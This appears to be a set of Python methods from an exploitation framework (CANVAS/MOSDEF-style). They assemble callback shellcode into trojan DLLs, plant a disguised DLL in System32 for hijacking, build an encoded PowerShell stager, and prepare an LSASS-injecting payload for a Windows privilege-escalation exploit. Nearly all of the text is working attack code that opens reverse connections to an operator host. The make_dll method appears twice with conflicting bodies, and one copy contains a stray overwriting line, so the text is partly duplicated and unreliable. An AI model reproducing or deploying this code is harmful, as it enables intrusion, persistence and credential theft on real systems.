def make_dll(self):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
if t_os.arch == "x64":
plds = payloads64(dll=True)
inner_pld = payloads64(module=self, dll=False)
assembly_inner = inner_pld.callback(self.callback.ip,
self.callback.port,
universal=True)
code_inner = inner_pld.assemble(assembly_inner)
assembly_outer = plds.wrap_payload(code_inner)
shellcode = plds.assemble(assembly_outer)
myPElib = PElib(win64=1)
trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=False)
else:
trojan_dll = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True,
encrypted=False,
dll=True,
win8_compatible=True)
trojan_dll = self.mosdeftrojan
return trojan_dll
def make_dll(self):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
if t_os.arch == "x64":
plds = payloads64(dll=True)
inner_pld = payloads64(module=self, dll=False)
assembly_inner = inner_pld.callback(self.callback.ip,
self.callback.port,
universal=True)
code_inner = inner_pld.assemble(assembly_inner)
assembly_outer = plds.wrap_payload(code_inner)
shellcode = plds.assemble(assembly_outer)
myPElib = PElib(win64=1)
trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=False)
else:
plds = payloads(module=self, dll=True)
assembly_inner = plds.callback(self.callback.ip,
self.callback.port,
universal=True)
shellcode = plds.assemble(assembly_inner)
myPElib = PElib()
importante = myPElib.get_random_imports()
trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=False,
importante=importante)
return trojan_dll
def get_shellcode(self):
logging.info(self.callback.ip)
logging.info(self.callback.port)
p = payloads64(module=self)
asmy = p.InjectToSelf(self.callback.ip, self.callback.port)
shellcode = p.assemble(asmy)
return shellcode
def make_dll_last_win(self):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
dll_name = ""
if t_os.arch == "x64":
dll_name = "dll_x64.dll"
plds = payloads64(
module=self,
dll=False) # False-> terminate thread // True -> ret
else:
dll_name = "dll_x86.dll"
plds = payloads(module=self, dll=False)
assembly_inner = plds.callback(self.callback.ip,
self.callback.port,
universal=True)
code_inner = plds.assemble(assembly_inner)
code_len = len(code_inner)
local_dll_path = os.path.join(self.binaries_path, dll_name)
with open(local_dll_path, 'rb') as f:
local_dll_binary = f.read()
pos = local_dll_binary.find("NOX")
tmp_dll_binary = local_dll_binary[:pos]
tmp_dll_binary += code_inner
tmp_dll_binary += local_dll_binary[pos + len(code_inner):]
tmp_dll_name = "%s.dll" % random.randint(10001, 99999)
tmp_dll_path = os.path.join(self.binaries_path, tmp_dll_name)
logging.info(tmp_dll_path)
with open(tmp_dll_path, 'wb') as f:
f.write(tmp_dll_binary)
windir = self.node.shell.GetEnvironmentVariable('SystemRoot')
if self.has_wow64():
remote_dll_path = windir + "\\Sysnative\\windowscoredeviceinfo.dll"
else:
remote_dll_path = windir + "\\System32\\windowscoredeviceinfo.dll"
if not self.nodeUpload(tmp_dll_path, remote_dll_path):
os.unlink(tmp_dll_path)
return False
os.unlink(tmp_dll_path)
return True
def mosdef_stager(self):
logging.info(self.callback.ip)
logging.info(self.callback.port)
p = payloads64(module=self)
asm = p.InjectToSelf(self.callback.ip, self.callback.port)
shellcode = p.assemble(asm)
psmosdef = mosdef_powershell(self)
# 'hack' to use mosdef_powershell objects
# is necessary set psmosdef.callback_script with the powershell payload
payload = ''
payload = str(self.pspayload(shellcode))
psmosdef.callback_script = payload
script_mosdef = psmosdef.generateEncPSCommand()
evil_object = self.get_object(script_mosdef)
return base64.b64encode(evil_object)
def vm_prepare_executables(self, tmp_directory):
if self.is_64bit_node() and (not self.is_win10_node()):
logging.info(
"VM exploit not capable of running on pre-10 Windows versions")
return None
c_string_padding = "A" * 300
exploit_name = "%s.exe" % random.randint(1001, 2000)
exploit_local_path = os.path.join(self.local_res,
"tmp_%s" % exploit_name)
exploit_rem_path = tmp_directory + exploit_name
mosdef_dll_name = "%s.dll" % random.randint(2001, 3000)
mosdef_local_path = os.path.join(self.local_res,
"tmp_%s" % mosdef_dll_name)
mosdef_rem_path = tmp_directory + mosdef_dll_name
return_value = [(exploit_local_path, exploit_rem_path),
(mosdef_local_path, mosdef_rem_path)]
exploit_orig_name = "vm_exploit32.exe"
if self.is_64bit_node() or self.has_wow64():
exploit_orig_name = "vm_exploit64.exe"
shellcode = None
mosdeftrojan = None
if self.is_64bit_node() or self.has_wow64():
pld = payloads64(module=self, dll=True)
shellcode_asm = pld.InjectToSelf(self.callback.ip,
self.callback.port)
shellcode = pld.assemble(shellcode_asm)
myPElib = pelib.PElib(win64=1)
mosdeftrojan = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=True)
else:
pld = payloads(module=self, dll=True)
shellcode_asm = pld.injectintoprocess(self.callback.ip,
self.callback.port,
load_winsock=True,
SeDebugPrivilege=True,
waitcode=False,
exit_thread=True,
universal=True,
dll_create_thread=False)
shellcode = pld.assemble(shellcode_asm)
myPElib = pelib.PElib()
importante = myPElib.get_random_imports()
mosdeftrojan = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=True,
importante=importante)
if mosdeftrojan == None:
logging.error("Error while building our PE")
return None
else:
logging.info("Writing MOSDEF LSASS inject trojan to %s" %
mosdef_local_path)
with open(mosdef_local_path, "wb") as handle:
handle.write(mosdeftrojan)
exploit_data = None
with open(os.path.join(self.local_res, exploit_orig_name),
"rb") as handle:
exploit_data = handle.read()
exploit_data = self.replace_c_string(
exploit_data, "MOSDEF_SHIM_DLL_PATH" + c_string_padding,
mosdef_rem_path)
logging.info("Writing exploit to %s" % exploit_local_path)
with open(exploit_local_path, "wb") as handle:
handle.write(exploit_data)
return return_value